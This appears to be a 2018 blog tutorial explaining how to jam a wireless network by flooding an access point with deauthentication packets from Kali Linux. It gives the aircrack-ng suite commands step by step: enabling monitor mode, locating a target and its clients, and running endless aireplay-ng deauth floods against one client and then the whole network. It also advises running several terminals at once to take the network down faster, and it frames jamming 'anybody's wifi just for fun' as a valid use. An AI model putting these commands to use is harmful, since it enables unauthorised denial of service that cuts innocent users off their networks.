-->

Friday 25 May 2018

Jamming Wifi Service: How To Perform DDOS Attack Or Jam A Wireless Network


In this tutorial, I am going to explain to you how to perform the DDOS attack on any wireless network or in simple words “How To Jam A Wifi Service In Kali Linux”. Wifi jamming is a way to disconnect unauthorized users on your network or even if you want to hang anybody’s wifi just for fun. We will flood the target access point by sending deauthentication packets So target access point will disconnect its all clients from the network. It is also called Denial Of Service Attack known as DOS. It doesn’t jam the actual radio frequencies.

Requirements For Attack:

For performing the DDOS attack on the wireless network you may need the following things in order to do this task:

Wireless Adapter(I Will Be Using TP-Link WN722N) 
Kali Linux Machine 
Target Access Point
Now If you have set up everything we are going t perform the attack, First of all, you need to enable monitor mode on your Adapter so it could scan all the access points around you. To Do this type in the following command:
airmon-ng start wlan0
Airmon-ng check kill

 Here wlan0 is my network adapter which will become wlan0mon in monitor mode.
The second command will kill the unnecessary processes that could cause problems in performing the attack.

Finding Out The Target Access Point

Now we will find the target access point on which we will perform attack.type in the following command:
airodump-ng wlan0mon






Now You can see we found an access point on which we will perform attack. Now let us check for the connected clients on this access point. Type in the following command:
airodump-ng -c 11 --bssid 56:27:58:D2:82:04 wlan0mon
Now here –c11 is the channel of that network and –bssid is the BSSID of the target network.

 Now we can see that one client whose BSSID is A4:17:31:AB:B6:7B is connected to the target network. Now we will perform the attack on the client connected to that network and then we will perform the attack on the whole network.

To perform the attack on a single client type in the following command:
aireplay-ng -0 0 -a 56:27:58:D2:82:04 -c A4:17:31:AB:B6:7B wlan0mon
Here –a is the access point and –c is the client connected to that network.



Now You can see that Kali machine started sending deauth attack to the target machine and here is the result:




Target Machine is unable to connect to the target access point.
Now we will perform deauthentication attack on the whole network type in the following command:
aireplay-ng -0 0 -a 56:27:58:D2:82:04 wlan0mon
Here -0 0 tells the machine to perform the attack for an infinite time. Here is the result:


It will cause the whole network to go down. Here is a main point a single terminal attack may not work fast try to open multiple terminals and keep attacking the network. It will cause the network to go down fast. Here I opened about 5 to 6 terminals and it worked. Here is the screenshot:





adcodehere

NEXT ARTICLE Next Post
PREVIOUS ARTICLE Previous Post
NEXT ARTICLE Next Post
PREVIOUS ARTICLE Previous Post
 

Delivered by FeedBurner